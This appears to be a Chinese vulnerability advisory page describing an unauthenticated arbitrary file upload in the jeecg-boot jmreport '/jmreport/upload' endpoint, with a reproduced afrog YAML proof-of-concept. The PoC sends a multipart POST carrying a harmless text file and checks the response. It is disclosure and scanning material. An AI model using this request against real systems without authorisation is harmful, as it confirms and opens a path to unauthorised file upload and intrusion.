jeecg-boot-jmreport-upload: jeecg-boot-jmreport接口任意文件上传漏洞

日期: 2025-09-01 | 影响软件: jeecg-boot-jmreport | POC: 已公开

漏洞描述

/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,经实测发现上传接口未授权,但访问上传后的文件需要登录,即带token。

PoC代码[已公开]

id: jeecg-boot-jmreport-upload

info:
  name: jeecg-boot-jmreport接口任意文件上传漏洞
  author: free2e
  severity: high
  verified: true
  description: |-
    /jeecg-boot/jmreport/upload接口存在未授权任意文件上传,经实测发现上传接口未授权,但访问上传后的文件需要登录,即带token。
  affected: jeecg-boot-jmreport接口
  solutions: 无
  reference:
  tags: jeecgboot,jmreport,积木报表,文件上传

rules:
  r0:
    request:
      method: POST
      path: /jmreport/upload
      headers:
        Content-Type: multipart/form-data; boundary=------WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"aaa.txt\"\r\n\
        Content-Type: text/html\r\n\
        \r\n\
        test123456\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileName\"\r\n\
        \r\n\
        aaa.txt\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"biz\"\r\n\
        \r\n\
        excel_online\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200  && response.body.bcontains(b'"jimureport"')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/Jeecg-boot-jmreport-upload.yaml

相关漏洞推荐